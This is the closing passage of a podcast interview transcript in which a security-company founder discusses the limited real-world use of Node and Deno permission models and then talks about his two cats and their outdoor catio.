I mean, I will say I've really met very few people that actually are able to use that. I don't want to pick on anyone. It's Node and Deno's permissions model is like it's not really used in my experience, at least, in real-world applications. It's really helpful when you're pulling a random script off the internet and you want to run it, and you don't want to give it access to the network and to your file system and stuff. It's amazing. But if you're building a real application that has to do all the things, like talk to the network, read the files, all this stuff, you're going to give it all the permissions anyway. And so, I think it's good, but it's not widely used and not really in its final form yet. 

[0:42:32] JG: More feature-rich experimentation required. 

[0:42:35] FA: Yeah, I think so. And then more work on the developer experience. How do you write these policy files? The node policy file is really complex format last I looked at it. I think there'll need to be some ways to autogenerate that that work really effectively and don't break your application before you're going to see widespread adoption of that kind of stuff. 

[0:42:52] JG: Looking forward to it. For us in our last minute, I'd like to end interviews with something very much non-technical. Can you tell us about your cats? 

[0:43:00] FA: Sure. Yeah. I got two cats. One is called Butter, and one is called Cream. And they are about one year old now. Actually, they just turned one. And they're amazing. They're super cute. I was hesitant to get cats for a super long time because I'm really busy working on the company and just traveling a lot, and I thought they would be a bit of a burden to find someone to take care of them when we're gone and stuff like that. But my wife was really excited about the idea of getting them. And I've always loved cats. And so she kept talking about it. 

And then one day, I come home and, in the bathroom, in the bathtub, I find a bunch of litter, cat food, and a bunch of cat toys. And I'm like, "Okay, she's up to something." And then the next day, when I come home, there's two kittens in the house. She just kind of went off on her own and got them. Ordered them on Craigslist, actually. 

There was someone who was looking for a home for their two kittens. And she got sent some videos, and then actually had them delivered via Uber package delivery. Uber picked them up and drove them two hours to our place. And that was probably a really fun Uber ride for that driver, having two kittens in the car. It's been amazing. They are a joy. 

[0:44:18] JG: Cats are fantastic. Since you mentioned conferences earlier, I found that in cities, for example, Athens, that have a large amount of cats, going out with other conference attendees and speakers to feed street cats is a surprisingly fantastic bonding and networking activity. 

[0:44:30] FA: That's so funny. They just go out and like give food to the cats and hang out with them, the wild cats? 

[0:44:34] JG: Yeah. Walk 30 seconds in any direction from, say, city center or Athens, you'll find them. 

[0:44:40] FA: That's awesome. I also found certain parts of Tokyo, or certain neighborhoods, have tons of wild cats. Well, feral cats, I guess, going around. And I just love cats. Yeah. Their behaviors, they're super cute. They're always up to something, you know? They're always investigating or trying to do something that they're not supposed to. It's kind of fun. 

[0:45:01] JG: Given how much time you spend day-to-day on people with very malicious intentions, it must be nice to work with a creature where the maximum maliciousness is that they want the treat you're not supposed to give them. 

[0:45:11] FA: Yeah, it's so true. They do get in trouble, too. They do find ways to climb into things they're not supposed to, get to. We just built a catio, which is like a little cat house outdoors over here by my desk. And it's quite big. It's like a 8-foot by six-foot outdoor structure. And I just crack the door, and then they're able to kind of go directly into the catio. But there's currently a little gap in the part above it. And so they figured out they can climb up the side of it and then get outside. I'm going to have to like add another layer of chicken wire on the top to kind of fully seal it with the door. Or else they're going to find a way to get out. 

[0:45:51] JG: Crafty creatures. 

[0:45:52] FA: Yeah, for sure. 

[0:45:52] JG: Well, Feross, thank you so much for spending extra time to talk not just about your open source career and journey, and what it's like to be a maintainer, and all the stuff Socket is doing to help protect open source projects and companies, but also about your adorable two cats. If folks want to learn more about you and/or Socket, where would you ask that they go on the internet? 

[0:46:10] FA: Yeah, I have a blog that doesn't get updated that much, but has a bunch of my writing, at feross.org. And then you can learn about Socket at socket.dev. And if folks want to email me, my email is just my first name @socket.dev. Feel free to hit me up. I always love talking about open source, or security, or whatever. Feel free to reach out. 

[0:46:29] FA: Well, that's fantastic. For Software Engineering Daily, this has been Feross and Josh Goldberg. Cheers, y'all. Have a nice day. 

[0:46:34] FA: Thanks, Josh.

[END]